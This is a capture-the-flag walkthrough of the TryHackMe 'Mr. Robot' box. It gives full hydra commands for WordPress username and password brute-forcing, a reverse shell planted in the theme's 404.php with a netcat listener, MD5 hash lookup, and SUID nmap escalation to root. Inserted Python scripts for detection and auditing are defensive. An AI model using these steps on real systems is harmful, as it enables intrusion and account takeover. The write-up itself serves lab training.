Mr. Robot - TryHackMe Walkthrough
“Can you root this Mr. Robot styled machine? This is a virtual machine meant for beginners/intermediate users. There are 3 hidden keys located on the machine, can you find them? Credit to Leon Johnson for creating this machine.”
This is a TryHackMe box. To access this you must sign up to https://tryhackme.com/.
URL: Mr. Robot
Difficulty: Medium
Author: Ben
Enumeration
We are given the IP 10.10.235.143. Run an nmap scan with the following command:
nmap -p- -A -oN portscan 10.10.235.143
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
These are very common ports on CTF boxes: SSH on 22 (closed here), HTTP on 80 and HTTPS on 443, both served by Apache.
Let’s start enumerating by exploring port 80 on my browser:
The fancy web terminal gives a few options which are all references to the TV show Mr. Robot.
Let’s do a dirb scan to find more paths in the web directory:
dirb http://10.10.235.143/
I stopped the scan early because it was taking a long time. I visited /login and it gave me a Wordpress login page.
The website is evidently running Wordpress which we know is prone to a lot of attacks.
Let’s run a Wordpress scan with WPScan. Please note, the newer version requires an API key you can get for free on their website.
Here are some of the important results from the scan:
The website is running WordPress version 4.3.1.
Unfortunately, no users have been found:
It is using the theme “twentyfifteen”:
There were 81 vulnerabilities found with the Wordpress version:
There is a robots.txt file:
This was also found in the dirb scan, let’s check it out:
User-agent: *
fsocity.dic
key-1-of-3.txt
Let’s check these paths out:
fsocity.dic:
I downloaded this file onto my local machine.
head fsocity.dic
wc -l fsocity.dic
This file contains 858160 lines of text and looks like a wordlist. This may come into use later.
key-1-of-3.txt:
This is the first key for the challenge.
There wasn't much else to find. WordPress boxes usually entail brute-forcing, but I have no usernames. We were given that dictionary earlier, so maybe the username is in there.
This is what happens when the wrong username is entered on Wordpress:
The error message states that the username is unknown. WordPress returns a different message for an unknown username than for a wrong password, so the login form leaks whether a username exists. We can feed hydra the dictionary as a username list and give it the "unknown username" failure string; any entry that produces a different response is a valid username.
ERROR: Invalid username. Lost your password?
The dictionary from earlier seems to have a lot of duplicates, so let's filter these out with sort piped into uniq.
sort fsocity.dic | uniq > new.dic
wc -l new.dic
The file was reduced to 11451 lines.
Let’s set up in order to brute-force the login.
You can find more information about this type of attack on these articles:
1 - Get the HTTP request that the login form sends:
2 - Open up Burp Suite with intercept turned on.
3 - Enter a random username and password on the website login page; Burp Suite should capture the request. Send it to Intruder and clear the payload positions (right-click > Send to Intruder > Clear §).
4 - Take note of this request, in particular the POST parameters and their names. You can turn off the proxy and intercept now.
Now we can use hydra to test out a bunch of usernames against the login. This is the hydra command:
hydra -vV -L new.dic -p somepassword 10.10.235.143 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
Here is a breakdown of the command above:
-vV: verbose output
-L new.dic: the list of candidate usernames
-p somepassword: a fixed password (irrelevant, since we are only testing usernames)
10.10.235.143: the host
http-post-form: brute-force an HTTP POST form
'/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username': login page, the POST parameters to send (^USER^ and ^PASS^ are substituted by hydra), and the F= failure message to look for in the response
Execute this command. After a few minutes I get the following result:
We have identified “elliot” as a username.
Now let’s attempt a password with this username but a different failed attempt message. This is the web page response when I enter the correct username and an incorrect password.
We have the following failed attempt message:
ERROR: The password you entered for the username Elliot is incorrect
Now let’s do the same method of bruting for the password. This is the new hydra command:
hydra -vV -P new.dic -l elliot 10.10.235.143 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=The password'
Notice how we are now using a single username with -l elliot and the dictionary as the password list with -P new.dic. We have also changed the failure message; I shortened it to "The password".
Running this command gives the following result:
login: elliot password: E*******2
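From the defender's side, both hydra runs above would appear in the Apache access log as a burst of POST requests to /wp-login.php from one source. The following script is an added example (not part of the original walkthrough) that parses Apache combined-format log lines and flags any client that posts to the login page more than a threshold number of times within a sliding window. The log lines it runs on are constructed inline; the field names, the threshold and the window size are my own choices.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache "combined" log format, e.g.
# 10.0.0.5 - - [10/Oct/2023:13:55:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None when the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), TS_FMT)
    path = m.group("path").split("?")[0]  # drop any query string
    return m.group("ip"), ts, m.group("method"), path, int(m.group("status"))


def detect_login_bruteforce(lines, threshold=10, window=timedelta(seconds=60), path="/wp-login.php"):
    """
    Flag source IPs that POST to `path` at least `threshold` times within any `window`.
    Returns {ip: peak_posts_in_window}.
    WordPress answers a failed login with HTTP 200 and the error in the body, so the status
    code cannot separate success from failure; the request volume is the signal.
    """
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, req_path, _status = rec
        if method == "POST" and req_path == path:
            posts[ip].append(ts)

    flagged = {}
    for ip, stamps in posts.items():
        stamps.sort()
        peak, start = 0, 0
        for end in range(len(stamps)):          # sliding window over sorted timestamps
            while stamps[end] - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def make_sample_log():
    """Constructed sample: one noisy client, one ordinary user, one unrelated request."""
    base = datetime(2023, 10, 10, 13, 55, 0, tzinfo=timezone.utc)

    def entry(ip, offset_s, method, path, status=200):
        ts = (base + timedelta(seconds=offset_s)).strftime(TS_FMT)
        return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 3120 "-" "Mozilla/5.0"'

    lines = [entry("10.0.0.5", i * 2, "POST", "/wp-login.php") for i in range(25)]   # 25 POSTs in 50 s
    lines += [entry("10.0.0.9", i * 600, "POST", "/wp-login.php") for i in range(3)]  # 3 POSTs over 20 min
    lines.append(entry("10.0.0.9", 5, "GET", "/robots.txt"))
    return lines


if __name__ == "__main__":
    for ip, n in detect_login_bruteforce(make_sample_log()).items():
        print(f"{ip}: {n} POST /wp-login.php requests within 60s")
```

Run against a real log with `detect_login_bruteforce(open("/var/log/apache2/access.log"))`. Because the username-enumeration run sends a fixed password with many usernames, a rule keyed only on failed passwords per account would miss it; counting POSTs per source IP catches both phases.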
Great. We have some credentials, so we now have authenticated access. We can now exploit this, aiming for some kind of reverse shell.
A pretty straightforward method of getting a reverse shell with WordPress is by uploading a PHP reverse shell file. I learnt this on another WordPress machine I recently completed.
You can read more about reverse shells here:
If you’re working from a Kali Linux machine, there are some pre-made web shells in the following directory:
/usr/share/webshells
Use the following command to copy a php reverse shell to your current directory:
cp /usr/share/webshells/php/php-reverse-shell.php .
Edit the file and set the listener address to your TryHackMe VPN IP and the port to 4444.
nano php-reverse-shell.php
I tried uploading the PHP file through the media uploader, but WordPress blocks any attempt to upload PHP files. Another method is to paste the code into an already existing PHP file.
Go to the theme editor in WordPress (Appearance > Editor) and replace the code of the theme's 404.php with the reverse shell.
Now the payload is ready, set up a netcat listener to listen on your specified port.
netcat -nvlp 4444
Now that everything is set up, visit the modified 404.php page.
http://10.10.235.143/404.php
We got the reverse shell, running as the "daemon" user.
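The foothold above relies on editing a theme file (404.php) through the WordPress editor, which leaves the theme directory different from its shipped state. The script below is an added example (not from the original walkthrough) of the file-integrity check a defender would run over a theme directory: build a SHA-256 manifest of the installed theme when it is known-good, then diff a fresh manifest against it to list modified, added and removed files. The theme contents it creates in a temporary directory are constructed placeholders, not the real twentyfifteen theme.

```python
import hashlib
import os
import tempfile


def sha256_of(path):
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map every file under root (relative, '/'-separated path) to its SHA-256."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_of(full)
    return manifest


def diff_manifests(baseline, current):
    """Compare two manifests and report what changed since the baseline was taken."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def simulate_theme_tamper():
    """Constructed scenario: baseline a placeholder theme, then tamper with it as an attacker would."""
    with tempfile.TemporaryDirectory() as theme_dir:
        files = {
            "404.php": "<?php get_header(); ?>\n<h1>Not found</h1>\n<?php get_footer(); ?>\n",
            "index.php": "<?php get_header(); ?>\n<?php get_footer(); ?>\n",
            "style.css": "/* Theme Name: placeholder theme */\n",
        }
        for rel, body in files.items():
            with open(os.path.join(theme_dir, rel), "w") as f:
                f.write(body)
        baseline = build_manifest(theme_dir)   # taken while the theme is known-good

        # Tampering: extra code appended to 404.php (placeholder comment, not a payload),
        # an unexpected new file, and a deleted file.
        with open(os.path.join(theme_dir, "404.php"), "a") as f:
            f.write("<?php /* injected placeholder */ ?>\n")
        with open(os.path.join(theme_dir, "extra.php"), "w") as f:
            f.write("<?php /* unexpected new file */ ?>\n")
        os.remove(os.path.join(theme_dir, "index.php"))

        return diff_manifests(baseline, build_manifest(theme_dir))


if __name__ == "__main__":
    for kind, paths in simulate_theme_tamper().items():
        print(f"{kind}: {paths}")
```

On a live site, take the baseline from a fresh copy of the theme (or from the vendor download) rather than from the possibly-compromised install, and diff `build_manifest("/var/www/html/wp-content/themes/twentyfifteen")` against it. Setting `define('DISALLOW_FILE_EDIT', true);` in wp-config.php removes the in-browser theme editor altogether, which closes the exact path used here.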
I went to visit the /home directory to see who is on the system. There is a user called robot with a couple of files. I was unable to see the contents of the key file but I was able to see what was inside “password.raw-md5”.
cd /home/robot
ls
cat key-2-of-3.txt
cat password.raw-md5
robot:c3****************************3b
This looks like an MD5 hash, and a quick Google search of it reveals the password (it sits in public hash lookup tables):
Let's try to switch to the robot user with the password we found in his home directory. Make sure the shell is first upgraded to a fully interactive TTY, because su refuses to prompt for a password without one.
python -c 'import pty; pty.spawn("/bin/bash")'
su robot
We have successfully logged in as robot, and we can now also view the second key in robot's home directory:
key-2-of-3.txt
Privilege Escalation
Now that we have a low-privileged user, we are aiming to escalate to root in order to have complete ownership of the system.
Let's first check for SUID binaries. SUID (set-user-ID) is a file permission bit that makes an executable run with the privileges of the file's owner rather than of the user who launches it. When the owner is root, a SUID binary that can be made to spawn a shell or write arbitrary files hands us root.
This following command checks for all the SUID binaries on the system:
find / -user root -perm -4000 -print 2>/dev/null
If you are interested in another machine where SUID exploitation is needed, look at my other writeup on ByteSec - a Vulnhub machine.
When analysing these binaries, it's good to have a list of the SUID binaries a distribution normally ships so that the odd one out stands out. Here is a list:
arping chfn chsh gpasswd mount newgrp passwd ping ping6 pppd su sudo umount
We can identify nmap as a non-native SUID binary, which needs investigating further. I researched how to exploit a SUID nmap binary. This is the website I used:
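The manual comparison above (find output versus a list of native binaries) is easy to automate, and it is the same check a defender should run periodically. The script below is an added example, not from the original walkthrough: it takes the output of the find command from the page, splits it into expected and unexpected SUID binaries using the list above as the allowlist, and also includes a live scanner that walks the filesystem with os.lstat. The sample find output is constructed; the allowlist is the page's own list and should be extended for your distribution.

```python
import os
import stat

# Allowlist of SUID binaries a typical distribution ships (the list from the walkthrough).
EXPECTED_SUID = frozenset({
    "arping", "chfn", "chsh", "gpasswd", "mount", "newgrp", "passwd",
    "ping", "ping6", "pppd", "su", "sudo", "umount",
})

# Constructed sample: what `find / -user root -perm -4000 -print 2>/dev/null` might return.
SAMPLE_FIND_OUTPUT = """\
/bin/ping
/bin/su
/bin/mount
/usr/bin/passwd
/usr/bin/sudo
/usr/local/bin/nmap
"""


def classify_suid(paths, expected=EXPECTED_SUID):
    """Split SUID binary paths into (expected, unexpected) by basename."""
    expected_hits, unexpected = [], []
    for p in paths:
        (expected_hits if os.path.basename(p) in expected else unexpected).append(p)
    return sorted(expected_hits), sorted(unexpected)


def audit_from_find_output(text, expected=EXPECTED_SUID):
    """Classify the lines of a saved `find ... -perm -4000` run."""
    paths = [line.strip() for line in text.splitlines() if line.strip()]
    return classify_suid(paths, expected)


def find_suid_binaries(roots=("/",)):
    """
    Live equivalent of the find command: regular files owned by uid 0 with the SUID bit set.
    Symlinks are not followed, and unreadable directories are skipped.
    """
    found = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and st.st_uid == 0:
                    found.append(path)
    return sorted(found)


if __name__ == "__main__":
    expected, unexpected = audit_from_find_output(SAMPLE_FIND_OUTPUT)
    print("expected  :", expected)
    print("unexpected:", unexpected)
```

For a live host, replace the sample with `classify_suid(find_suid_binaries())`, which can take a while on a large filesystem. Anything in the unexpected list either needs the SUID bit removed (`chmod u-s <path>`) or a documented reason to keep it; an nmap binary with SUID set has no such reason, and note that current Nmap releases no longer ship the --interactive mode used below.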
First, let's get an interactive nmap shell with the following command:
nmap --interactive
At the nmap prompt, the next command spawns a shell with the elevated privileges:
!sh
And we have root! Nice and simple SUID exploitation for elevating rights. The last key is in /root: